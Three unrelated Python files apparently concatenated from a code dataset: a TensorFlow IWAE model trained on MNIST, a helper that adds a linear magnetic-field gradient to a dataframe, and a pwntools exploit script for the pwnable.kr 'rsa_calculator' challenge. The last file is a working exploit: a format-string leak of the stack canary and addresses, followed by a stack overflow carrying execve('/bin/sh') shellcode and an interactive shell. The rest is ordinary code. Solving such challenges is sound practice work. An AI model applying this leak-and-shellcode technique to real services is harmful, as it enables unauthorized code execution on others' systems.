self.log_w = tf.zeros(dtype=tf.float32, shape=[batch_size, self.k])
self.norm_w = tf.zeros_like(self.log_w)
self.sess = sess
self.recon = self.model(self.data_ph)
self.loss, self.obj_loss = self.objective_function()
with tf.name_scope('Optimizer'):
self.optimizer = tf.train.AdamOptimizer(learning_rate=lr, beta1=0.9, beta2=0.999).minimize(self.obj_loss)
self.summary = tf.Summary()
loss_summary = tf.summary.scalar('Objective loss', self.tot_obj_loss)
self.merge_op = tf.summary.merge_all()
print('Logging to:', './logs/' + str(datetime.datetime.now()))
self.writer = tf.summary.FileWriter('./logs/' + str(datetime.datetime.now()))
def dense(self, x_, num_units, init_scale=0.01, scope_name=''):
"""
Dense layer including Weight normalization and initialization
as presented by (Kingma & Salimans, Weight normalization, 2016)
based on code from: https://github.com/openai/weightnorm/blob/master/tensorflow/nn.py
currently not giving any good desirable results
:param x: input data
:param num_units: number of units in the dense layer
:param init_scale: initialization scale
:param scope_name: name of current scope
:return: data run through dense layer
"""
with tf.variable_scope(scope_name):
ema = tf.train.ExponentialMovingAverage(decay=0.998)
if self.init is not False:
V = tf.get_variable('V', shape=[int(x_.get_shape()[-1]), num_units], dtype=tf.float32,
initializer=tf.random_normal_initializer(0, 0.05), trainable=True)
g = tf.get_variable('g', shape=[num_units], dtype=tf.float32,
initializer=tf.constant_initializer(1.), trainable=True)
b = tf.get_variable('b', shape=[num_units], dtype=tf.float32,
initializer=tf.constant_initializer(0.), trainable=True)
else:
V = tf.get_variable('V')
g = tf.get_variable('g')
b = tf.get_variable('b')
tf.assert_variables_initialized([V, g, b])
ema.apply([V, g, b])
g_ = tf.expand_dims(g, 0)
g_ = tf.tile(g_, [self.k, 1])
# use weight normalization (Salimans & Kingma, 2016)
x = tf.matmul(x_, V)
scaler = g_ / tf.sqrt(tf.reduce_sum(tf.square(V), [0]))
b_ = tf.expand_dims(b, 0)
b_ = tf.tile(b_, [self.k, 1])
x = tf.reshape(scaler, [1, self.k, num_units]) * x + tf.reshape(b_, [1, self.k, num_units])
if self.init is not False: # normalize x
m_init, v_init = tf.nn.moments(x, [0])
m_init = m_init[0]
scale_init = init_scale / tf.sqrt(v_init + 1e-10)
scale_init = scale_init[0]
with tf.control_dependencies([g.assign(g * scale_init), b.assign_add(-m_init * scale_init)]):
# x = tf.identity(x)
g_s = tf.expand_dims(g, 0)
g_s = tf.tile(g_s, [self.k, 1])
x = tf.matmul(x_, V)
scaler = g_s / tf.sqrt(tf.reduce_sum(tf.square(V), [0]))
b_ = tf.expand_dims(b, 0)
b_ = tf.tile(b_, [self.k, 1])
x = tf.reshape(scaler, [1, self.k, num_units]) * x + tf.reshape(b_, [1, self.k, num_units])
return x
def MLP_layer(self, x, mlp_units, out_dims, scope_name=''):
"""
MLP layer with sampling built in
:param x: input data
:param mlp_units: dimensions of the MLP layers
:param out_dims: output dimension for matching the next MLP layer
:param scope_name: set the scope_name for WeightNorm, currently not working properly
:return: nu, rho
"""
# 2 regular linear dense layers with leaky Relu activations
# x = self.dense(x, num_units=mlp_units, init_scale=1., scope_name=scope_name + '_dense1')
x = tf.layers.dense(x, mlp_units)
h_inter = tf.nn.leaky_relu(x, alpha=0.1)
# h_i = self.dense(h_inter, num_units=mlp_units, init_scale=1., scope_name=scope_name + '_dense2')
h_i = tf.layers.dense(h_inter, mlp_units)
h_i = tf.nn.leaky_relu(h_i, alpha=0.1)
# nu = self.dense(h_i, num_units=out_dims, init_scale=1., scope_name=scope_name + '_dense3')
nu = tf.layers.dense(h_i, out_dims)
# rho = 0.01 + tf.nn.softplus(self.dense(h_i, num_units=out_dims, init_scale=1., scope_name=scope_name + '_dense4'))
rho = 0.01 + tf.nn.softplus(tf.layers.dense(h_i, out_dims))
return nu, rho
def sample_z(self, nu, rho, value=None, bern=False):
"""
sample from N(nu, rho)
:param nu: mean
:param rho: stddev
:param value: None or the latent variables from the corresponding encoder layer (if we are in the decoder layer)
:param bern: Flag for using a bernoulli distribution
:return: logprob(z|nu,rho) & z
"""
# flag for using a bernoulli distribution
if bern:
sample_dist = tf.distributions.Bernoulli(logits=nu, dtype=tf.float32)
nu_bern = sample_dist.mean()
return nu_bern, self.bincrossentropy(value, nu)
# reparametrization trick
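        # z = nu + rho * eps with eps ~ N(0, I), so the sample stays differentiable
        # with respect to nu and rho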
eps = tf.random_normal(tf.shape(nu), dtype=tf.float32)
z_next = nu + rho*eps
if value is not None:
estimate = value
else:
estimate = z_next
log2pi = 0.5*np.log(2*np.pi)
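        # log-density of `estimate` under a diagonal Gaussian N(nu, rho^2):
        # -0.5*log(2*pi) - 0.5 * sum(((estimate - nu)/rho)^2 + 2*log(rho)) over the
        # last axis (note: the 2*pi constant is applied once, not per dimension)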
logprob_z = (-tf.constant(log2pi, dtype=tf.float32))-\
0.5*(tf.reduce_sum(tf.square((estimate-nu)/rho) + 2*tf.log(rho), axis=-1))
return z_next, logprob_z
def bincrossentropy(self, x, x_hat):
"""
calculate binary cross-entropy between true image and reconstruction
:param x: true image
:param x_hat: reconstructed image at the bernoulli layer of the decoder
:return: binary cross-entropy
"""
x_hat = tf.nn.sigmoid(x_hat)
bce = x * tf.log(x_hat + 1e-8) + (1 - x) * tf.log(1 - x_hat + 1e-8)
return tf.reduce_sum(bce, axis=-1)
def calc_logw(self, q_logprob, p_logprob):
"""
calculate the log weights
:param q_logprob: output of a layer in q
:param p_logprob: output of a layer in p
:return: no return
"""
self.log_w += p_logprob - q_logprob
def calc_norm_tilde(self):
"""
calculates the normalized importance weights
:return: no return
"""
log_w_max = tf.math.reduce_max(self.log_w, axis=-1, keepdims=True)
log_w = tf.math.subtract(self.log_w, log_w_max)
w = tf.math.exp(log_w)
self.norm_w = tf.math.divide(w, tf.math.reduce_sum(w, axis=-1, keepdims=True))
def objective_function(self):
"""
Calculate the objective function loss
:return: deprecated loss and objective function loss
"""
k = tf.constant(self.k, dtype=tf.float32)
with tf.name_scope('Loss'):
# this loss is currently not used anywhere, deprecated
self.calc_norm_tilde()
loss = - tf.reduce_mean(tf.reduce_sum(self.norm_w * self.log_w, axis=-1))
# objective loss over k-samples
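            # IWAE bound per example: log(1/k * sum_i w_i) = logsumexp(log w_i) - log k,
            # summed over the minibatch and negated so it can be minimized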
log_sum_w = tf.reduce_logsumexp(self.log_w, axis=-1)
obj_loss = - tf.reduce_sum(tf.math.subtract(log_sum_w, tf.math.log(k)), axis=0)
return loss, obj_loss
def train(self, trn_data):
trn_data = np.array([self.k * [x] for x in trn_data])
_, recon, obj_loss, loss, log_w = self.sess.run([self.optimizer,
self.recon,
self.obj_loss,
self.loss,
self.log_w],
feed_dict={
self.train_ph: True,
self.data_ph: trn_data,
self.init: False
})
return recon, obj_loss, loss, log_w
def test(self, test_data):
test_data = np.array([self.k * [x] for x in test_data])
recon, obj_loss, loss, log_w = self.sess.run([self.recon,
self.obj_loss,
self.loss,
self.log_w],
feed_dict={
self.data_ph: test_data,
self.train_ph: False,
self.init: False
})
return recon, obj_loss, loss
def data_based_initialize(self, mb_data):
test_data = np.array([self.k * [x] for x in mb_data])
empt = self.sess.run([], feed_dict={self.data_ph: test_data, self.init: True})
def model(self, q_z_next):
"""
IWAE model structure for the Non-facturized case
:param q_z_next: input data
:return: returns a reconstructed image
"""
self.log_w = tf.zeros_like(self.log_w)
q_logprob_tot = 0
p_logprob_tot = 0
q_nu_next = None
q_rho_next = None
recon = None
q_zs = [q_z_next]
if self.small is True:
mult = 2
else:
mult = 8
# Encoder portion
for mlp_units in self.h_units:
with tf.name_scope('Q_MLP_layer'):
q_dense_name = 'Q_MLP_layer_{}_'.format(mlp_units)
q_nu_next, q_rho_next = self.MLP_layer(q_z_next, mlp_units=mult * mlp_units,
out_dims=mlp_units, scope_name=q_dense_name)
with tf.name_scope('Q_stochastic_layer'):
q_z_next, q_logprob = self.sample_z(q_nu_next, q_rho_next)
q_logprob_tot += q_logprob
q_zs.append(q_z_next)
# account for prior ~ N(0,1)
with tf.name_scope('Prior'):
prior_nu = tf.zeros_like(q_nu_next)
prior_rho = tf.ones_like(q_rho_next)
_, prior_logprob = self.sample_z(prior_nu, prior_rho, q_z_next)
p_logprob_tot += prior_logprob
# Decoder portion
for p_out, mlp_units, q_z_in, q_z_out in zip([8, 16, 32, 64, 784],
self.h_units[::-1],
q_zs[:0:-1],
q_zs[-2::-1]):
# at last decoder layer, sample from Bernoulli dist
if p_out == 784:
bern = True
else:
bern = False
with tf.name_scope('P_MLP_layer'):
p_dense_name = 'P_MLP_layer_{}_'.format(mlp_units)
p_nu, p_rho = self.MLP_layer(
q_z_in, mlp_units=2 * mlp_units, out_dims=p_out, scope_name=p_dense_name)
with tf.name_scope('P_stochastic_layer'):
p_z_next, p_logprob = self.sample_z(p_nu, p_rho, q_z_out, bern=bern)
if bern:
recon = p_z_next
p_logprob_tot += p_logprob
with tf.name_scope('log_w'):
self.calc_logw(q_logprob_tot, p_logprob_tot)
return recon
def mb(x, batch_size):
"""
Minibatch generator
:param x: input data
:param batch_size: desired batch size
:return: yield a new batch each call
"""
n_samples = x.shape[0]
n_batches = int(np.ceil(n_samples / batch_size))
while True:
permutation = np.random.permutation(x.shape[0])
for b in range(n_batches):
batch_idx = permutation[b *
batch_size:(b + 1) * batch_size]
batch = x[batch_idx]
            if batch.shape[0] != batch_size:
continue
yield batch
parser = ArgumentParser("Tensorflow implementation of IWAE in TMC-paper from NeurIPS 2019")
parser.add_argument('-k', dest='k', type=int, default=20, help="Option for choosing k")
parser.add_argument('--epochs', dest='epochs', type=int, default=1200, help="Option for choosing number of epochs")
parser.add_argument('--batch_size', dest='batch_size', type=int, default=128, help="Option for choosing batch size")
parser.add_argument('--model_type', dest='model_type', type=str, default='small', help="Option for using small or large model")
args = parser.parse_args()
print("Batch size: ", args.batch_size)
print("Number of epochs: ", args.epochs)
print("Model type: ", args.model_type)
print("k: ", args.k)
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train = x_train.astype('float32') / 255.0
x_test = x_test.astype('float32') / 255.0
batch_size = 128
# TODO TEST WITH k = 5, k = 20, k = 50, k = 100
model_type = args.model_type
if model_type == 'small':
small = True
else:
small = False
restore_and_recon = True
lr = float(1e-3)
batch_size = args.batch_size
# want to test with k = 5, 20, 50, 100
"""TODO: TEST WITH k = 5, k = 20, k = 50, k = 100"""
k = args.k
epochs = args.epochs
save_path = 'IWAE_model_non_fac_{}_k_{}'.format(model_type, k)
if not os.path.exists(save_path):
os.mkdir(save_path)
with tf.Session() as sess:
IWAE_net = IWAE(batch_size=batch_size, input_shape=784, k_samples=k, layer_specs=[64, 32, 16, 8, 4],
lr=lr, sess=sess, small=small)
sess.run(tf.global_variables_initializer())
saver = tf.train.Saver()
if restore_and_recon:
saver.restore(sess, '{}'.format(tf.train.latest_checkpoint('/home/linus/DD2412-Reproducibility-project-Group-61/IWAE/IWAE_model_non_fac_small_k_20_iwae_obj/')))
x_gen_test = mb(x_test, 128)
for k in range(70):
test_batch = next(x_gen_test).reshape(batch_size, 784)
recon, obj_loss, loss = IWAE_net.test(test_data=test_batch)
fig, axes = plt.subplots(10, 10)
fig.subplots_adjust(hspace=0)
fig.subplots_adjust(wspace=0)
for j in range(10):
for i in range(10):
axes[j][0].imshow(test_batch[j].reshape(28, 28))
axes[j][0].axis('off')
axes[j][i].imshow(recon[j][i].reshape(28, 28))
axes[j][i].axis('off')
plt.axis('off')
axes[0][0].set_title('Original')
for c in range(1, i+1):
axes[0][c].set_title('Recon')
plt.tight_layout()
plt.show()
else:
x_gen = mb(x_train, batch_size)
x_gen_test = mb(x_test, batch_size)
# x_gen_init = mb(x_train, batch_size)
test_err = []
try:
for epoch in range(1, epochs+1):
# used for the WeightNorm initialization, our implementation is flawed and not used
# if epoch == 1:
# init_batch = next(x_gen_init).reshape(batch_size, 784)
# IWAE_net.data_based_initialize(init_batch)
# iterate enough times to see all of the training data each epoch 1 -> (len(train_data)/batch_size)
for mb_epoch in range(1, 470):
x_batch = next(x_gen).reshape(batch_size, 784)
recon, obj_loss, loss, log_w = IWAE_net.train(x_batch)
test_batch_counter = 0
batch_test_err = 0
# iterate enough times to see all of the test data each epoch 1 -> (len(test_data)/batch_size)
for test_epoch in range(1, 80):
x_batch_test = next(x_gen_test).reshape(batch_size, 784)
test_batch_counter += x_batch_test.shape[0]
recon, obj_loss, loss = IWAE_net.test(x_batch_test)
batch_test_err += obj_loss
testing_err = batch_test_err/int(test_batch_counter) # normalize total error over the nr of batch samples
summary = IWAE_net.sess.run(IWAE_net.merge_op, feed_dict={IWAE_net.tot_obj_loss: testing_err})
IWAE_net.writer.add_summary(summary, global_step=epoch)
# ugly hack for resetting the loss between epochs, only needed for tensorboard
summary = IWAE_net.sess.run(IWAE_net.merge_op, feed_dict={IWAE_net.tot_obj_loss: 0})
test_err.append(testing_err)
print('=====> Objective loss at epoch {}: {}'.format(str(epoch), str(testing_err)))
if epoch == epochs:
# save model at end of runs
print('got to end for model IWAE non-factorized {} with k: {}'.format(model_type, k))
total_obj_loss_model = np.array(test_err)
np.save(save_path+"/tot_obj_loss_k_{}_non_fac_{}".format(k, model_type), total_obj_loss_model)
saver.save(sess,
save_path+"/model_IWAE_forward_non_fac_{}_with_k{}.ckpt".format(model_type, k))
print(test_err)
except KeyboardInterrupt:
# possibility to save model before all epochs have run
print('Stopped training and testing at epoch {} for model IWAE non-factorized {} with k: {}'.format(epoch,
model_type,
k))
total_obj_loss_model = np.array(test_err)
np.save(save_path + "/tot_obj_loss_k_{}_non_fac_{}".format(k, model_type), total_obj_loss_model)
saver.save(sess,
save_path + "/model_IWAE_forward_non_fac_{}_with_k{}.ckpt".format(model_type, k))
|
StarcoderdataPython
|
3500333
|
import numpy as np
def get_B_df_distorted(df, v="0", **kwargs):
if v == "0":
return dist0(df, **kwargs)
def dist0(df, **kwargs):
df_ = df.copy()
    Bzf = kwargs.get('Bzf', 0.)
    Bz0 = kwargs.get('Bz0', 100.)  # Gauss
    z0 = kwargs.get('z0', 3.239)  # m
    zf = kwargs.get('zf', 14.139)  # m
slope = (Bzf - Bz0) / (zf - z0)
intercept = (Bzf - slope * zf)
Bx, By, Bz = linear_gradient(df_[['X','Y','Z']].values.T, slope, intercept)
# print(Bx.mean(),By.mean(),Bz.mean())
Br = np.sqrt(Bx**2 + By**2)
Bphi = -Bx*np.sin(df_.Phi.values)+By*np.cos(df_.Phi.values)
df_.eval('Bx = Bx + @Bx', inplace=True)
df_.eval('By = By + @By', inplace=True)
df_.eval('Bz = Bz + @Bz', inplace=True)
df_.eval('Br = Br + @Br', inplace=True)
df_.eval('Bphi = Bphi + @Bphi', inplace=True)
return df_
def linear_gradient(pos, slope, intercept):
x, y, z = pos
r = (x**2 + y**2)**(1/2)
phi = np.arctan2(y,x)
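    # a uniform axial gradient dBz/dz = slope needs a compensating radial component
    # so that div(B) = 0 in the source-free region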
Bz = slope * z + intercept
    Br = - (r / 2) * slope  # Br = -(r / 2) * (dBz/dz)
Bx = Br * np.cos(phi)
By = Br * np.sin(phi)
return np.array([Bx, By, Bz])
|
StarcoderdataPython
|
8010258
|
#!/usr/bin/env python3
from pwn import *
context(arch = 'amd64', os = 'linux')
def xgcd(b, n): # extended Euclid: return a triple (g, x, y) such that b*x + n*y = g = gcd(b, n)
x0, x1, y0, y1 = 1, 0, 0, 1
while n != 0:
q, b, n = b // n, n, b % n
x0, x1 = x1, x0 - q * x1
y0, y1 = y1, y0 - q * y1
return b, x0, y0
def SendLine(process, str):
process.sendline(str)
print(str)
def SetKey(process, p : int, q : int, e : int, d : int):
SendLine(process, '1')
print(process.recv().decode(), end='')
SendLine(process, str(p))
print(process.recv().decode(), end='')
SendLine(process, str(q))
print(process.recv().decode(), end='')
SendLine(process, str(e))
print(process.recv().decode(), end='')
SendLine(process, str(d))
print(process.recv().decode(), end='')
def RSA_encrypt(string : str, n : int, e : int):
byte_string = string.encode()
ret = b''
for x in byte_string:
ret += pack(pow(x, e, n), 32)
return ret.hex()
def LeakInfo(process, n, e):
SendLine(process, '3')
print(process.recv().decode(), end='')
SendLine(process, '-1')
print(process.recv().decode(), end='')
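    # the decrypted plaintext is echoed through printf, so the positional
    # specifiers (%205$llx, %208$llx, %207$llx) leak stack values that LeakInfo
    # interprets as the canary, saved rbp and return address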
SendLine(process, RSA_encrypt('0x%205$llx,0x%208$llx,0x%207$llx', n, e))
print(process.readuntil('- decrypted result -\n').decode(), end='')
info = process.readline().replace(b'\n', b'').decode()
print(info)
info = info.split(',')
return int(info[0], 16), int(info[1], 16), int(info[2], 16)
def exploit(process, payload):
print(process.recv().decode(), end='')
    SendLine(process, '3')
print(process.recv().decode(), end='')
SendLine(process, '-1')
print(process.recv().decode(), end='')
SendLine(process, payload)
#Process = process(['/home/doublesine/Desktop/rsa_calculator'])
Process = remote('pwnable.kr', 9012)
print(Process.recv().decode(), end='')
p = 30011
q = 30013
n = p * q
phi = (p - 1) * (q - 1)
e = 11
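# d = multiplicative inverse of e modulo phi, taken from the extended Euclidean
# algorithm; it must come out positive for the assert below to hold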
d = xgcd(e, phi)[1]
assert d > 0 and (e * d) % phi == 1
SetKey(Process, p, q, e, d)
canary, rbp, ret_addr = LeakInfo(Process, n, e)
rbp -= 0x100
data_addr = rbp - 0x210
shellcode_start = data_addr + \
16 + \
16 + \
16 + \
16 + \
16
system_addr = ret_addr - 0x40140a + 0x4007c0
print('----------------------------')
print('canary =', hex(canary))
print('rbp =', hex(rbp))
print('ret_addr =', hex(ret_addr))
print('system_addr', hex(system_addr))
print('data_addr =', hex(data_addr))
print('----------------------------')
shellcode = None
try:
shellcode = asm('mov rdi, rsp') + \
asm('mov rax, 59') + \
asm('xor rsi, rsi') + \
asm('xor rdx, rdx') + \
asm('syscall')
except:
shellcode = bytes.fromhex('4889e748c7c03b0000004831f64831d20f05')
whatever_you_want = 123
payload = pack(whatever_you_want, 64).hex().encode().hex() + \
pack(canary, 64).hex().encode().hex() + \
pack(rbp & 0xffffffffffff0000, 64).hex().encode().hex() + \
pack(shellcode_start, 64).hex().encode().hex() + \
b'/bin/sh\x00'.hex().encode().hex() + \
shellcode.hex()
payload += 'a' * (1024 - len(payload))
exploit(Process, payload)
Process.interactive()
|
StarcoderdataPython
|